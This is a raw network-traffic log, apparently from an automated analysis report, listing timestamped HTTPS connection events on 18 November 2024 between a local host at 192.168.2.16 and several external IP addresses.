                                                                                                                                                                                            Nov 18, 2024 21:00:09.562210083 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562289000 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562361956 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562376976 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562396049 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562441111 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.562906027 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.563261986 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.563365936 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.563388109 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.590786934 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:09.590845108 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.590970993 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:09.591186047 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:09.591217995 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595308065 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595354080 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595370054 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595411062 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595462084 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595729113 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595747948 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595784903 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595786095 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595813036 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595830917 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595848083 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595921040 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595971107 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.595992088 CET4434978466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.596013069 CET49784443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.598367929 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.598632097 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.598645926 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600153923 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600210905 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600223064 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600230932 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600279093 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600512028 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600564003 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600572109 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600593090 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600617886 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600692987 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.600702047 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.601053953 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.601062059 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.601130962 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.601819992 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.601958990 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.602025032 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.602150917 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.602161884 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.602808952 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.602854967 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.603770018 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.603897095 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.605123997 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.605185032 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.605474949 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.605550051 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.605592012 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.606380939 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.606399059 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.628421068 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.628484011 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.628910065 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.628962994 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.628988028 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629020929 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629393101 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629404068 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629667997 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629730940 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.629853964 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.630172968 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.630203962 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.636708975 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.636944056 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.636960030 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.638015032 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.638086081 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.638509989 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.638576031 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.638627052 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.640430927 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.640755892 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.640778065 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641135931 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641561031 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641622066 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641664982 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641849995 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.641918898 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.647331953 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.653353930 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.653359890 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.653372049 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.659667015 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.659748077 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660218954 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660304070 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660346985 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660358906 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660389900 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660449028 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660461903 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660538912 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660576105 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660588980 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660599947 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660613060 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660629034 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660867929 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.660923004 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.661134958 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.661309958 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.661336899 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.668009043 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.668219090 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.668236971 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.669118881 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.669199944 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.670083046 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.670150995 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.670268059 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.670284986 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.679362059 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.682156086 CET44349795184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.682244062 CET49795443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:09.684365034 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.684370041 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.684381962 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.684385061 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.687334061 CET49795443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:09.687345982 CET44349795184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.687752008 CET44349795184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.703826904 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.703907013 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.703927994 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.703979015 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.704000950 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.704031944 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.709078074 CET49789443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:09.715387106 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.716767073 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.716859102 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717165947 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717223883 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717232943 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717247963 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717267990 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717289925 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717782021 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717863083 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717870951 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717885017 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.717927933 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.718117952 CET49783443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.718132019 CET4434978366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.718590975 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.718658924 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.718739033 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.719185114 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.719213009 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.731362104 CET49795443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:09.731384039 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.738075972 CET49795443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:09.747373104 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780081987 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780138016 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780286074 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780359983 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780802965 CET49796443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.780827999 CET4434979666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.782879114 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.782932997 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.783037901 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.783250093 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.783276081 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.783327103 CET44349795184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.791776896 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.792018890 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.792026043 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.795249939 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.795335054 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.799771070 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.799875021 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.799879074 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.799912930 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823426008 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823437929 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823497057 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823810101 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823818922 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.823878050 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824759960 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824820042 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824829102 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824882030 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824963093 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824971914 CET4434979366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.824985027 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825000048 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825015068 CET49793443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825284958 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825319052 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825388908 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825690031 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.825715065 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.830990076 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831007957 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831053019 CET44349806104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831063032 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831085920 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831141949 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831322908 CET49806443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831343889 CET44349806104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831696987 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.831712008 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.833268881 CET44349806104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.833343983 CET49806443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:09.833678007 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.833698988 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.833776951 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.834086895 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.834098101 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.834986925 CET49806443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835128069 CET44349806104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835280895 CET49806443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835288048 CET44349806104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835813999 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835832119 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835880041 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835890055 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835901022 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.835937023 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.836472988 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.836486101 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.837104082 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.837142944 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.837275982 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.837559938 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.837575912 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.843477964 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.843492031 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.865695953 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.865806103 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.865932941 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.865993023 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866007090 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866080046 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866106987 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866115093 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866154909 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866163015 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866930962 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.866993904 CET44349790142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.867048979 CET49790443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:09.869841099 CET44349789142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.872598886 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.872853994 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.872884035 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875267982 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875325918 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875380039 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875438929 CET49806443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875946999 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.875971079 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.876446009 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.876518965 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.877095938 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.877306938 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.877403021 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.881194115 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.881458998 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.881468058 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.882704973 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.883021116 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.883136034 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.883140087 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.883193970 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.886507034 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.886552095 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.887356997 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.887507915 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.887527943 CET44349826162.159.140.229192.168.2.16
